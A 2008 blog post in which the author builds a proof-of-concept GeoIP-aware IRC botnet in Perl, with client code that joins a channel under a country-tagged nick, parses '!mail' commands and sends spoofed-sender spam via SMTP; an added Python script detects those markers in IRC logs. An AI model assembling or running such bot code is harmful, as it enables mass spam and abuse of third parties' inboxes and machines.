GeoIP botnet
Jul 5th, 2008 by knutee
Lately, I’ve been looking into botnets and how they work. The idea of controlling an army of computers is both intriguing and scary at the same time. The basic idea is a number of slave computers that receive orders from a centralized server and carry out instructions. However, I wanted to see if these bots and the server could be aware of geographical location, and then utilize this knowledge to adapt the orders given out. This could mean altering the choice of from_address and smtp_server, and adapting the type of attack/spam according to loopholes in that country’s laws.
Now, I expect this function to already be implemented in most modern bots, but since I’m a curious person, I wanted to make my own proof-of-concept botnet. Due to both ethical and legal issues, I needed to keep the bots at an experimental level, that is, unable to spread themselves or accidentally cause harm. I do not wish to create a real botnet, just create a dummy version for learning purposes. Due to this I will be writing the code in Perl and only show portions of the code here. I’m also working on a version written in C, but I’m keeping that to myself for now.
First off I needed to make a basic outline for my system. I want a server sitting in an IRC channel passing commands to bots that join the channel. These bots log into the channel with names based on location, present themselves with IP and country, read chat for commands and perform e-mail spam on command.
Client
As described before, the client’s job is to log on to an IRC server, join a channel and perform actions based on commands. For my example, e-mail spam will do. In its current state a lot of the parameters are hardcoded as I do not need the full flexibility to prove the concept.
    ### Includes ###
    use Data::Dumper;
    use Net::IRC;
    use MIME::Lite;     # Enable the MIME Lite module for mail handling
    use Net::SMTP;      # Enable the SMTP module for mail sending
    use Sys::Hostname;  # Enable the System module for hostname lookup
    use LWP::Simple;
    use Geo::IPfree;
Most of the includes speak for themselves. First off, we need to acquire the client’s location. This is done with the Geo::IPfree module.
    ### Get ip and geo information ###
    my $my_ip = get("http://whatismyip.org/");
    my ($country, $country_name) = Geo::IPfree::LookUp($my_ip);
Secondly, we need to fill in some parameters for both the mail handling and IRC connection. I’ve chosen to randomly generate a number behind the bot’s name and location for this example.
    ### Adjust sender, recipient, SMTP mailhost and get hostname ###
    my $from_address = 'fake@fakedomain.com';     # Mail from value
    my $to_address   = 'victim@victimdomain.com'; # Mail to value
    my $mail_host    = 'smtp.whatever.com';       # Mail server
    my $host         = hostname;                  # Get local hostname

    ### create the IRC object ###
    my $irc = new Net::IRC;
    # $random_nr is the randomly generated number mentioned above (its generation is not shown)
    my $random_nick = "bot-$country-$random_nr";
After this is done you need to give the bot instructions on how to connect to a server and channel, and add a default action when logging on if needed (like acquiring a new name from the server bot). It finishes by listening for the MOTD to confirm that we are connected. This code has been excluded from the example.
Further on, we need to make the bot listen for events in the IRC channel. The easiest way is to listen for a text string that starts with a pre-defined word, and then look for a specific string of parameters needed for the “spam event”. This is called sub on_public. For my example I look for this string:
What this means is that I’m looking for a string similar to: !mail victim@victimdomain.com $header_text $body_text. The client will read these parameters into variables that can be used for the e-mail portion of the code. Using the MIME::Lite module, we can easily send mails with the following code:
    ### Create e-mail from data ###
    $msg = MIME::Lite->new(
        From    => $from_address,
        To      => $1,           # The victim e-mail
        Subject => $2,           # The header_text
        Data    => $3,           # The body_text
        Type    => 'text/plain'
    );
    MIME::Lite->send('smtp', $mail_host, Timeout => 60);
    $msg->send;
And that’s it for the client part really. Add the remaining needed code, and this bot will log onto your IRC channel and await spam instructions. To verify that it works, the command string can be entered manually in the IRC channel.
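Seen from the monitoring side, the client described above leaves two fixed markers in IRC traffic: the bot-country-number nick and the !mail command in a channel. The following is an added detection example, not code from the original post. It assumes raw IRC lines of the form ":nick!user@host COMMAND params", a two-letter country code in the nick, a hypothetical function name analyze, and a constructed sample capture.

```python
import re
from collections import defaultdict

# Nick scheme from the post: "bot-<country code>-<random number>"
# (assumption: the country code is two letters)
BOT_NICK = re.compile(r"^bot-([A-Za-z]{2})-(\d+)$")
# Command shape from the post: "!mail <address> <header_text> <body_text>"
MAIL_CMD = re.compile(r"^!mail\s+(\S+@\S+)\s+\S")
# Raw IRC line as relayed by a server: ":nick!user@host COMMAND params"
IRC_LINE = re.compile(r"^:([^!\s]+)!\S+\s+(JOIN|PRIVMSG)\s+(.*)$")

def analyze(lines):
    """Return (bots_by_channel, alerts) from raw IRC lines."""
    bots = defaultdict(dict)  # channel -> {nick: country code}
    alerts = []
    for line in lines:
        m = IRC_LINE.match(line.strip())
        if not m:
            continue
        nick, command, params = m.groups()
        if command == "JOIN":
            channel = params.lstrip(":").split()[0]
            hit = BOT_NICK.match(nick)
            if hit:
                bots[channel][nick] = hit.group(1).upper()
        else:  # PRIVMSG <target> :<text>
            target, _, text = params.partition(" :")
            cmd = MAIL_CMD.match(text)
            # Alert only when bot-pattern nicks sit in the channel that got the command
            if cmd and bots.get(target):
                alerts.append({
                    "channel": target,
                    "controller": nick,
                    "recipient": cmd.group(1),
                    "listening_bots": sorted(bots[target]),
                })
    return dict(bots), alerts

# Constructed sample capture (documentation addresses, not real traffic).
SAMPLE = [
    ":bot-NO-4821!u@198.51.100.7 JOIN :#chan",
    ":alice!a@192.0.2.10 JOIN :#chan",
    ":bot-US-1190!u@203.0.113.44 JOIN #chan",
    ":alice!a@192.0.2.10 PRIVMSG #chan :hello everyone",
    ":op!o@192.0.2.99 PRIVMSG #chan :!mail user@example.org Subject Body",
    ":op!o@192.0.2.99 PRIVMSG #other :!mail user@example.org Subject Body",
]

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

Requiring both markers together keeps an ordinary user who merely types !mail in an unrelated channel from raising an alert.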
Server
Since the server is a work in progress, the code will be presented later.
Future
- Add more functions to the clients
- Clients acquire new name from server
- Channel selection based on nationality
- Server !mail message will contain mail_from and smtp_server
- Add a database to the server to sort client location and jobs
- Add rule set for different countries